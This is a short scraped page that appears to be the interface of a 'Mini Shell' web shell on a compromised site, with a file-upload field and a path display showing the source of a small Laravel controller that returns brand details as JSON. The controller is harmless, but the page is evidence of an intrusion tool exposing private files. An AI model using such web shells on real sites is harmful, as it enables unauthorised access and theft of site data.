HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/thread-self/cwd/app/Http/Controllers/
Upload File :
Current File : //proc/thread-self/cwd/app/Http/Controllers/BrandDetailController.php
<?php

namespace App\Http\Controllers;

use App\Models\Brand;
use App\Models\BrandDetail;
use Illuminate\Http\Request;

class BrandDetailController extends Controller
{
    public function getBrandsByBrands($brandId)
    {

        $brands = BrandDetail::where('brand_id', $brandId)->get();
        return response()->json($brands);
    }
}